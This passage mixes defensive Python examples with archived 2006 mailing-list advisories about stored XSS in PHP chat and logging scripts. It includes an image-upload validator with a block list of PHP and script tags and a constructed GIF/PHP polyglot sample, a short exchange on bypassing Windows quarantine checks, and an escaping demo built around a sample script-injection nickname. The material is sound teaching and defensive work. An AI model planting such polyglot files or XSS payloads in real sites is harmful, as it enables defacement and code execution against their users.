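# Leading-byte signatures of the image types accepted here (standard formats;
# the set of types the gallery itself accepts is not on the page).
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# Markers that must not appear anywhere in an accepted image.
PHP_TAGS = (b"<?php", b"<?=", b"<script")


def sniff_image_type(data):
    """Return the format whose signature the bytes begin with, else None."""
    for ext, sigs in MAGIC.items():
        if any(data.startswith(s) for s in sigs):
            return ext
    return None


def validate_upload(filename, data):
    """Return (accepted, reason) for an upload.

    The extension-only check the post describes accepts anything named *.gif;
    this requires the bytes to carry a matching image signature and refuses
    files that also carry PHP tags, since a valid header followed by code is
    still executable if the web server is ever made to run the file.
    """
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in MAGIC:
        return False, "extension not allowed"
    sniffed = sniff_image_type(data)
    if sniffed is None:
        return False, "content is not a recognised image"
    if MAGIC[sniffed] != MAGIC[ext]:
        return False, "content (%s) does not match extension (%s)" % (sniffed, ext)
    if any(tag in data for tag in PHP_TAGS):
        return False, "image carries embedded script tags"
    return True, "ok"


# Constructed uploads covering the cases above (none is a real image).
SAMPLES = {
    "photo.gif": b"GIF89a" + bytes(16),
    "script.gif": b"<?php echo 'not an image'; ?>",
    "polyglot.gif": b"GIF89a" + bytes(4) + b"<?php echo 'x'; ?>",
    "renamed.gif": b"\x89PNG\r\n\x1a\n" + bytes(8),
    "notes.txt": b"plain text",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, validate_upload(name, blob))
```

Content sniffing narrows what gets stored; it does not replace keeping the upload directory outside the document root (or marking it non-executable), which is what stops an accepted file from being run through the kind of inclusion bug the post mentions.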


QBv14 XSS

2006-05-23 Thread zerogue
QBv14 XSS


Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)


QBv14 doesn't filter anything at all, in short:


XSS heaven.


Nomenumbra


IpLogger <= 1.7 XSS

2006-05-23 Thread zerogue
IpLogger <= 1.7 XSS


Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (potential privilege escalation,possible defacement)


tjthedj's IpLogger (http://tjthedj.us/projects/iplogger/) suffers from XSS in a 
user's useragent.

It is possible to construct a useragent containing javascript, thus

being displayed to the user once he checks the logs.


Nomenumbra


DSChat <= 1.0 XSS

2006-05-23 Thread zerogue
DSChat <= 1.0 XSS


Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)


DSChat is a PHP-based chatscript which does no filtering

against XSS whatsoever, thus allowing anyone to insert 

html or javascript in the chatbox.


Nomenumbra


Re: Circumventing quarantine control in Windows 2003 and ISA 2004

2006-05-23 Thread 3APA3A
Dear Memet Anwar,

MA>  The problem is due to how the requirements are
MA> validated, it is trivial for users to trick RRAS/ISA into believing that the
MA> client's system are always aligned with the requirements, regardless the
MA> actual condition.

If  you  have local administrator level access to the box you can bypass
any  "internal" checks for this box. You can bypass any Domain policies.
You can do everything.

Quarantine  Control  was  not designed to protect against attack of this
kind. It's a tool to check policy matching, not to protect

http://www.microsoft.com/technet/prodtechnol/isa/2004/plan/vpnroamingquarantine.mspx

-=-=-=-=- Quote begin -=-=-=-=-

Although Quarantine Control does not protect against attackers,
computer  configurations  for  authorized  users can be verified and, if
necessary, corrected before they can access the network.

-=-=-=-=-= Quote end =-=-=-=-=-

-- 
~/ZARAZA
http://www.security.nnov.ru/



Chatty improper input sanitizing

2006-05-23 Thread zerogue
Chatty improper input sanitizing


Discovered by: Nomenumbra

Date: 21/5/2006

impact:moderate (possible defacement)


Chatty is a PHP-based chatscript allowing users to chat over the web.

Subscribing with a username like this: alert(%22xss%22)

would cause major xss in the chatroom.


Nomenumbra
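
The shoutbox, chat and logger posts in this digest (SkyeShoutbox, QBv14, DSChat, Chatty, IpLogger, E-Friends) all come down to stored user text being written into HTML unescaped. The following is an added example, not code from any of those projects: a chat line rendered unfiltered next to the same line with each value escaped for the context it lands in, using the standard `html` module, plus a cheap check on the rendered output. The template and the sample nicknames are constructed; the script-wrapped nickname extends the `alert(%22xss%22)` string from the Chatty post.

```python
import html
from urllib.parse import unquote

# Constructed markup for one chat line: the nickname lands both in a
# double-quoted attribute and in a text node, the message in a text node.
TEMPLATE = '<li class="msg"><span class="nick" title="%s">%s</span>: %s</li>'


def render_line_unfiltered(username, message):
    """The pattern the posts describe: stored input echoed into the page as-is."""
    return TEMPLATE % (username, username, message)


def render_line(username, message):
    """Escape each untrusted value for the context it lands in.

    quote=True also turns '"' into &quot;, which matters for the title="..."
    attribute: without it a quote in the nickname would close the attribute
    and whatever follows would be parsed as new attributes.
    """
    safe_user = html.escape(username, quote=True)
    safe_msg = html.escape(message, quote=True)
    return TEMPLATE % (safe_user, safe_user, safe_msg)


def looks_inert(fragment):
    """Cheap check on rendered output: no markup may have come from user data.

    The template itself contributes exactly 4 '<' characters and 6 quote
    marks; any extra '<' or '"' in the result came from an unescaped value.
    """
    return fragment.count("<") == 4 and fragment.count('"') == 6


# Constructed inputs: the Chatty post's username, URL-decoded and wrapped in a
# script element as a stored-XSS sample, and a nickname containing a quote.
SCRIPT_NICK = unquote("<script>alert(%22xss%22)</script>")
QUOTED_NICK = 'O"Brien'

if __name__ == "__main__":
    for nick in (SCRIPT_NICK, QUOTED_NICK):
        print(render_line_unfiltered(nick, "hi"))
        print(render_line(nick, "hi"))
```

Escaping at output time, in the context the value is written into, is what makes the stored text inert; stripping characters at input time (the "filtering" the posts ask for) is fragile because the same string may later be written into an attribute, a text node or a script block, each with different rules.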